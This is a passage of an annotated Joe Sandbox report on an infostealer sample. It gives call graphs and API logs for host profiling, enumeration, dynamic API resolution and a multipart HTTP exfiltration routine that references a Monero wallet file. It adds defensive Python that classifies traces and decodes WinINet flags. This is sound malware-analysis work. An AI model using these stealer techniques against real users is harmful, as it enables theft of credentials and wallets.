• 9276c6: RegOpenKeyExA, RegQueryValueExA (9276e7), RegCloseKey (927704); reached after 9277a0 -> 927720: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA (927765), RegCloseKey (927780)
• 9198d0 -> 919880 -> 916fb0 -> 916d40: 916660 (VirtualAlloc at 91668f and 916743), 9169b0 (LoadLibraryA at 916a09, GetProcAddress at 916ba8, with 928a10 GetProcessHeap/RtlAllocateHeap and 9289f0 GetProcessHeap/HeapFree), VirtualFree (916ee6), FreeLibrary (916f26), 9289f0
• function containing 920759: calls 9198d0 first, then compares strings with StrCmpCA (920799, 920865, 92099c) and, through the 911590/92a7a0/92a740 string helpers, dispatches to 91fb00, 920030 or 920250 (92a740, 928de0 with 2 API calls, 92a920, 92a8a0, 92a9b0)
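The call graph above gives the order in which the sample profiles the host (local time, time zone, locale, keyboard layouts, power status, processor topology, memory), enumerates registry subkeys and running processes, base64-encodes data with CryptBinaryToStringA and sends it over WinINet, fetches further content with InternetOpenUrlA/InternetReadFile, and runs a VirtualAlloc, LoadLibraryA/GetProcAddress, VirtualFree sequence. The Python below is an added example, not code from the report or from Joe Sandbox, that turns such an API trace into behaviour categories and a combined "profile, enumerate, then send" rule. The categories, thresholds and the ordering requirement are the author's assumptions; the sample trace is constructed from the API names in the graph above, in the order the graph reaches them.

```python
"""Classify a sandbox API trace into infostealer behaviour categories.

Added example; the categories, thresholds and ordering rule are the author's
assumptions, not part of the Joe Sandbox report. SAMPLE_TRACE is constructed
from the API names in the call graph, in the order the graph reaches them.
"""

# Each category names the APIs that characterise it (analyst's grouping).
CATEGORIES = {
    "host_profiling": {
        "GetLocalTime", "GetTimeZoneInformation", "GetUserDefaultLocaleName",
        "GetKeyboardLayoutList", "GetLocaleInfoA", "GetSystemPowerStatus",
        "GetLogicalProcessorInformationEx", "GetSystemInfo", "GlobalMemoryStatusEx",
    },
    "registry_enumeration": {"RegOpenKeyExA", "RegEnumKeyExA", "RegQueryValueExA"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "http_send": {"InternetCrackUrlA", "CryptBinaryToStringA", "InternetOpenA",
                  "InternetConnectA", "HttpOpenRequestA"},
    "http_download": {"InternetOpenUrlA", "InternetReadFile"},
    "in_memory_loader": {"VirtualAlloc", "LoadLibraryA", "GetProcAddress",
                         "VirtualFree", "FreeLibrary"},
}

# Minimum number of distinct APIs of a category that must appear before it counts.
MIN_HITS = {"host_profiling": 4, "registry_enumeration": 2, "process_enumeration": 2,
            "http_send": 3, "http_download": 2, "in_memory_loader": 3}


def classify(trace):
    """Return {category: sorted matched APIs} for every category at or above its threshold."""
    seen = set(trace)
    return {cat: sorted(apis & seen)
            for cat, apis in CATEGORIES.items()
            if len(apis & seen) >= MIN_HITS[cat]}


def first_index(trace, apis):
    """Position of the first call in the trace that belongs to `apis`, or None."""
    return next((i for i, api in enumerate(trace) if api in apis), None)


def stealer_profile(trace):
    """Fingerprint, enumerate, then send: all three present, profiling before sending."""
    hits = classify(trace)
    if "host_profiling" not in hits or "http_send" not in hits:
        return False
    if "registry_enumeration" not in hits and "process_enumeration" not in hits:
        return False
    profile_at = first_index(trace, CATEGORIES["host_profiling"])
    send_at = first_index(trace, CATEGORIES["http_send"])
    return profile_at < send_at


# Constructed trace: API names from the call graph, in the order reached.
SAMPLE_TRACE = [
    "lstrcpy", "GetProcessHeap", "RtlAllocateHeap", "GetLocalTime", "wsprintfA",
    "GetTimeZoneInformation", "GetUserDefaultLocaleName", "CharToOemW",
    "GetKeyboardLayoutList", "GetLocaleInfoA", "GetSystemPowerStatus",
    "GetCurrentProcessId", "OpenProcess", "GetModuleFileNameExA", "CloseHandle",
    "RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey",
    "GetLogicalProcessorInformationEx", "GetSystemInfo", "GlobalMemoryStatusEx",
    "RegOpenKeyExA", "RegEnumKeyExA", "RegQueryValueExA", "RegCloseKey",
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next", "CloseHandle",
    "InternetCrackUrlA", "CryptBinaryToStringA", "InternetOpenA", "GetSystemTime",
    "InternetConnectA", "HttpOpenRequestA", "InternetCloseHandle",
    "InternetOpenUrlA", "InternetReadFile", "InternetCloseHandle",
    "VirtualAlloc", "LoadLibraryA", "GetProcAddress", "VirtualFree", "FreeLibrary",
]

# Contrast case: a process that only reads system information and never sends it.
BENIGN_TRACE = ["GetLocalTime", "GetTimeZoneInformation", "GetSystemInfo",
                "GlobalMemoryStatusEx", "wsprintfA"]

if __name__ == "__main__":
    for cat, apis in classify(SAMPLE_TRACE).items():
        print(f"{cat}: {', '.join(apis)}")
    print("stealer profile:", stealer_profile(SAMPLE_TRACE))
    print("benign trace:", stealer_profile(BENIGN_TRACE))
```

The ordering check is what separates a stealer from a system-information tool that also phones home: reversing the sample trace keeps every category but fails the rule, because the first network call then precedes the first profiling call.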

Control-flow Graph (function at 929860; basic blocks and the edges the graph shows)
• 929860-929874: call 929750; continues to 92987a or to 929a93
• 92987a-929a8e: call 929780, GetProcAddress x21; then 929a93
• 929a93-929af2: LoadLibraryA x5; then 929af4 or 929b0d
• 929af4-929b08: GetProcAddress; then 929b0d
• 929b0d-929b14: then 929b16 or 929b46
• 929b16-929b41: GetProcAddress x2; then 929b46
• 929b46-929b4d: then 929b4f or 929b68
• 929b4f-929b63: GetProcAddress; then 929b68
• 929b68-929b6f: then 929b71 or 929b89
• 929b71-929b84: GetProcAddress; then 929b89
• 929b89-929b90: then 929b92 or 929bc1
• 929b92-929bbc: GetProcAddress x2; then 929bc1
• 929bc1-929bc2: end
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,010431E0), ref: 009298A1
                          • GetProcAddress.KERNEL32(74DD0000,010430F0), ref: 009298BA
                          • GetProcAddress.KERNEL32(74DD0000,01043240), ref: 009298D2
                          • GetProcAddress.KERNEL32(74DD0000,01043180), ref: 009298EA
                          • GetProcAddress.KERNEL32(74DD0000,01043258), ref: 00929903
                          • GetProcAddress.KERNEL32(74DD0000,0104A018), ref: 0092991B
                          • GetProcAddress.KERNEL32(74DD0000,01035970), ref: 00929933
                          • GetProcAddress.KERNEL32(74DD0000,010359F0), ref: 0092994C
                          • GetProcAddress.KERNEL32(74DD0000,010431C8), ref: 00929964
                          • GetProcAddress.KERNEL32(74DD0000,01043288), ref: 0092997C
                          • GetProcAddress.KERNEL32(74DD0000,01042FE8), ref: 00929995
                          • GetProcAddress.KERNEL32(74DD0000,010432A0), ref: 009299AD
                          • GetProcAddress.KERNEL32(74DD0000,01035710), ref: 009299C5
                          • GetProcAddress.KERNEL32(74DD0000,010432B8), ref: 009299DE
                          • GetProcAddress.KERNEL32(74DD0000,010432D0), ref: 009299F6
                          • GetProcAddress.KERNEL32(74DD0000,01035830), ref: 00929A0E
                          • GetProcAddress.KERNEL32(74DD0000,01043018), ref: 00929A27
                          • GetProcAddress.KERNEL32(74DD0000,01043030), ref: 00929A3F
                          • GetProcAddress.KERNEL32(74DD0000,01035A70), ref: 00929A57
                          • GetProcAddress.KERNEL32(74DD0000,01043078), ref: 00929A70
                          • GetProcAddress.KERNEL32(74DD0000,010358B0), ref: 00929A88
                          • LoadLibraryA.KERNEL32(01043360,?,00926A00), ref: 00929A9A
                          • LoadLibraryA.KERNEL32(010432E8,?,00926A00), ref: 00929AAB
                          • LoadLibraryA.KERNEL32(01043330,?,00926A00), ref: 00929ABD
                          • LoadLibraryA.KERNEL32(010433A8,?,00926A00), ref: 00929ACF
                          • LoadLibraryA.KERNEL32(01043348,?,00926A00), ref: 00929AE0
                          • GetProcAddress.KERNEL32(75A70000,01043378), ref: 00929B02
                          • GetProcAddress.KERNEL32(75290000,01043300), ref: 00929B23
                          • GetProcAddress.KERNEL32(75290000,01043390), ref: 00929B3B
                          • GetProcAddress.KERNEL32(75BD0000,01043318), ref: 00929B5D
                          • GetProcAddress.KERNEL32(75450000,01035A10), ref: 00929B7E
                          • GetProcAddress.KERNEL32(76E90000,0104A028), ref: 00929B9F
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00929BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00929BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 3d6111ae639a723487fc5ec958ab44fa5a76e3f4567599e136081c135c037089
                          • Instruction ID: 7149d25357b407c0fde790e44ab5615a775ae814aad6026a47980cd29816527b
                          • Opcode Fuzzy Hash: 3d6111ae639a723487fc5ec958ab44fa5a76e3f4567599e136081c135c037089
                          • Instruction Fuzzy Hash: E9A128B5500344AFD344EFA8FD98B663BF9F78C303B14479AA705A3264DE39A841CB52

Control-flow Graph (function at 9145c0; basic blocks and the edges the graph shows)
• 9145c0-914695: RtlAllocateHeap; then 9146a0
• 9146a0-9146a6: loop head; then 9146ac or 91474f
• 9146ac-91474a: loop body; back to 9146a0
• 91474f-9147a9: VirtualProtect; end
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0091479C
                          Strings
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (the same string, referenced 30 times): 009145C7, 009145D2, 009145DD, 009145E8, 009145F3, 00914617, 00914622, 0091462D, 00914638, 00914643, 00914657, 00914662, 0091466D, 00914678, 00914683, 009146AC, 009146B7, 009146C2, 009146CD, 009146D8, 00914713, 0091471E, 00914729, 00914734, 0091473F, 0091474F, 0091475A, 00914765, 00914770, 0091477B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one sentence is repeated 30 times in the record, `$`-separated, with no other string referenced by the function)
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 47ff257db9bdd3608e57acf0b1c9f06ae0e2e1cee898a5ed391489e78da35dab
                          • Instruction ID: 918dbef3517ad6b9246b7d869393c18e8d1b293abbb027930944b6306de5673a
                          • Opcode Fuzzy Hash: 47ff257db9bdd3608e57acf0b1c9f06ae0e2e1cee898a5ed391489e78da35dab
                          • Instruction Fuzzy Hash: 6A4106606C66047BE638B7A4A942EFD7B765FCA70CFA17668FA1052680CBB077014D26

                          Control-flow Graph (rendered as an image in the report; the executed / not-executed colouring of nodes is lost in this text export, node labels and edges are kept below)
                          • 801 914880-914942 call 92a7a0 call 9147b0 call 92a740 * 5 InternetOpenA StrCmpCA -> 816, 817
                          • 816 914944 -> 817
                          • 817 91494b-91494f -> 818, 819
                          • 818 914955-914acd call 928b60 call 92a920 call 92a8a0 call 92a800 * 2 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a920 call 92a8a0 call 92a800 * 2 InternetConnectA -> 819, 905
                          • 819 914ecb-914ef3 InternetCloseHandle call 92aad0 call 919ac0 -> 829, 830
                          • 829 914f32-914fa2 call 928990 * 2 call 92a7a0 call 92a800 * 8 (no successors)
                          • 830 914ef5-914f2d call 92a820 call 92a9b0 call 92a8a0 call 92a800 -> 829
                          • 905 914ad3-914ad7 -> 906, 907
                          • 906 914ae5 -> 908
                          • 907 914ad9-914ae3 -> 908
                          • 908 914aef-914b22 HttpOpenRequestA -> 909, 910
                          • 909 914b28-914e28 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a9b0 call 92a8a0 call 92a800 call 92a920 call 92a8a0 call 92a800 call 92a740 call 92a920 * 2 call 92a8a0 call 92a800 * 2 call 92aad0 lstrlen call 92aad0 * 2 lstrlen call 92aad0 HttpSendRequestA -> 1021
                          • 910 914ebe-914ec5 InternetCloseHandle -> 819
                          • 1021 914e32-914e5c InternetReadFile -> 1022, 1023
                          • 1022 914e67-914eb9 InternetCloseHandle call 92a800 -> 910
                          • 1023 914e5e-914e65 -> 1022, 1024
                          • 1024 914e69-914ea7 call 92a9b0 call 92a8a0 call 92a800 -> 1021
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                            • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00914915
                          • StrCmpCA.SHLWAPI(?,01050A00), ref: 0091493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00914ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00930DDB,00000000,?,?,00000000,?,",00000000,?,01050A60), ref: 00914DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00914E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00914E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00914E49
                          • InternetCloseHandle.WININET(00000000), ref: 00914EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00914EC5
                          • HttpOpenRequestA.WININET(00000000,010509A0,?,010500C8,00000000,00000000,00400100,00000000), ref: 00914B15
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • InternetCloseHandle.WININET(00000000), ref: 00914ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: c27c94acfec7f380b88632f1a7da88f9383c7911dddb147c334e0f1b9896b33a
                          • Instruction ID: dac3edc1f8bcd7e1d41c35c523c3749dda5c2139c6d52137a5d84d4e5e8b164c
                          • Opcode Fuzzy Hash: c27c94acfec7f380b88632f1a7da88f9383c7911dddb147c334e0f1b9896b33a
                          • Instruction Fuzzy Hash: BA12BD729112289BDB15EB90EC92FEEB778BF98300F504199F10662095DF702F89CF66
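The record above is the sample's HTTP transaction routine. The subcall at 0x9147B0 splits the configured URL with InternetCrackUrlA; the function then opens a WinINet session (InternetOpenA, access type 1), connects (InternetConnectA, service 3), creates a request (HttpOpenRequestA, flags 0x00400100), assembles the body with the lstrcpy/lstrcat helpers at 0x92A9B0, 0x92A8A0 and 0x92A920, sends it (HttpSendRequestA) and reads the reply in the 1021 -> 1023 -> 1024 -> 1021 loop of the graph, 0x7CF bytes per InternetReadFile call, before closing the three handles. The string references `"`, `"`, `------`, `------`, `------` are the pieces needed for a multipart/form-data body (the quoting in `name="..."` and the boundary prefix), which is consistent with the exfiltration POST of a stealer. The verb, object and version arguments of HttpOpenRequestA (010509A0, ?, 010500C8) and the second StrCmpCA argument (01050A00) are printed as pointers, not text, so this record does not state the method, path or host; the report's malware-configuration section carries the C2 URL. What follows is an added example, not part of the Joe Sandbox report, that decodes the numeric WinINet arguments in the lines above; the sample input is copied from this record, and the regex, the constant tables (values from wininet.h) and the function names are mine:

```python
"""Decode the numeric WinINet arguments Joe Sandbox logged for the HTTP
transaction routine at 0x914880 (added example; not part of the report)."""
import re

# API lines copied from the record above. Constructed input for this example:
# '?' marks an argument the sandbox printed as unresolved.
C2_FUNCTION_APIS = """
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00914915
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00914ABA
• HttpOpenRequestA.WININET(00000000,010509A0,?,010500C8,00000000,00000000,00400100,00000000), ref: 00914B15
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00914E18
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00914E49
• InternetCloseHandle.WININET(00000000), ref: 00914EAD
"""

# One '• Api.MODULE(arg,arg,...), ref: ADDR' line as Joe Sandbox prints it.
LINE_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

def parse_api_lines(text):
    """Return [(api, module, [arg, ...], ref_address)] for every API line in text."""
    rows = []
    for m in LINE_RE.finditer(text):
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        rows.append((m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return rows

def arg_int(arg):
    """Hex argument -> int; '?' (unresolved in the log) -> None."""
    return None if arg == "?" else int(arg, 16)

# Values from wininet.h in the Windows SDK.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}

def decode_flags(value):
    """Split a dwFlags value into flag names; unknown bits are kept as hex."""
    names = [name for bit, name in INTERNET_FLAGS.items() if value & bit]
    leftover = value & ~sum(INTERNET_FLAGS)
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names

def describe_c2_sequence(text):
    """Pull the facts an analyst wants from the logged WinINet calls."""
    facts = {}
    for api, _mod, args, _ref in parse_api_lines(text):
        if api == "InternetOpenA":            # (agent, accessType, proxy, bypass, flags)
            facts["access_type"] = OPEN_TYPES.get(arg_int(args[1]), "unknown")
        elif api == "InternetConnectA":       # (session, server, port, user, pass, service, flags, ctx)
            facts["port"] = arg_int(args[2])  # None: port not resolved in the log
            facts["service"] = SERVICES.get(arg_int(args[5]), "unknown")
        elif api == "HttpOpenRequestA":       # (conn, verb, object, version, referrer, accept, flags, ctx)
            facts["request_flags"] = decode_flags(arg_int(args[6]))
            facts["verb_is_pointer"] = arg_int(args[1]) is not None  # verb text not shown in the log
        elif api == "InternetReadFile":       # (request, buffer, bytesToRead, bytesRead)
            facts["read_chunk"] = arg_int(args[2])
    return facts

if __name__ == "__main__":
    for key, value in describe_c2_sequence(C2_FUNCTION_APIS).items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the decoded facts: a direct (no proxy) session, an HTTP connection whose port the log did not resolve, a request opened with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, and a 1999-byte read chunk. The same parser accepts any other API list from the report, so it can be pointed at other WinINet-using functions to compare their flag choices.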
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: the same 14 memory dumps as listed in the first record above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: c248f2ab3b221e8149ab55937a00a6ccd2e3a50cdbc4cca3ad9193a93d22bf26
                          • Instruction ID: 7d0b16b6c39ab3ad93839439d107b9b07fd5387d70958cedee535278fff96341
                          • Opcode Fuzzy Hash: c248f2ab3b221e8149ab55937a00a6ccd2e3a50cdbc4cca3ad9193a93d22bf26
                          • Instruction Fuzzy Hash: 67016DB1A04308EBC710DF98ED45BABFBB8FB48B21F10425AEA45F3280D77459448BA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: the same 14 memory dumps as listed in the first record above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: abaf5480555a9bf7331650fa9a5bbcd0180de9f2ee12a649683b86a6c5122ec1
                          • Instruction ID: 2b6a8ffbba3985c023b497c69c69c83a45558257055455649e509b16d89d5e7f
                          • Opcode Fuzzy Hash: abaf5480555a9bf7331650fa9a5bbcd0180de9f2ee12a649683b86a6c5122ec1
                          • Instruction Fuzzy Hash: E3F04FB1944208ABC704DF98DD49BAEFBB8FB08712F10065AFA05A3680D77819048BA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: the same 14 memory dumps as listed in the first record above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 1667428b634bbc42c0fce042d9e9b701208fa8e89ddf6ad0da53f931e00ee73e
                          • Instruction ID: cfcc766b4acd3cbf5c972b3e2987b6b7a09e52c6fdb29d910c962bd965e9d6bf
                          • Opcode Fuzzy Hash: 1667428b634bbc42c0fce042d9e9b701208fa8e89ddf6ad0da53f931e00ee73e
                          • Instruction Fuzzy Hash: 73D05E7490430CEBCB00DFE0D8496DDBB78FB0C312F000699D90573340EE306881CAA6

                          Control-flow Graph (rendered as an image in the report; the executed / not-executed colouring of nodes is lost in this text export, node labels and edges are kept below)
                          • 633 929c10-929c1a -> 634, 635
                          • 634 929c20-92a031 GetProcAddress * 43 -> 635
                          • 635 92a036-92a0ca LoadLibraryA * 8 -> 636, 637
                          • 636 92a146-92a14d -> 638, 639
                          • 637 92a0cc-92a141 GetProcAddress * 5 -> 636
                          • 638 92a153-92a211 GetProcAddress * 8 -> 639
                          • 639 92a216-92a21d -> 640, 641
                          • 640 92a298-92a29f -> 642, 643
                          • 641 92a21f-92a293 GetProcAddress * 5 -> 640
                          • 642 92a337-92a33e -> 644, 645
                          • 643 92a2a5-92a332 GetProcAddress * 6 -> 642
                          • 644 92a344-92a41a GetProcAddress * 9 -> 645
                          • 645 92a41f-92a426 -> 646, 647
                          • 646 92a4a2-92a4a9 -> 648, 649
                          • 647 92a428-92a49d GetProcAddress * 5 -> 646
                          • 648 92a4ab-92a4d7 GetProcAddress * 2 -> 649
                          • 649 92a4dc-92a4e3 -> 650, 651
                          • 650 92a515-92a51c -> 652, 653
                          • 651 92a4e5-92a510 GetProcAddress * 2 -> 650
                          • 652 92a612-92a619 -> 654, 655
                          • 653 92a522-92a60d GetProcAddress * 10 -> 652
                          • 654 92a61b-92a678 GetProcAddress * 4 -> 655
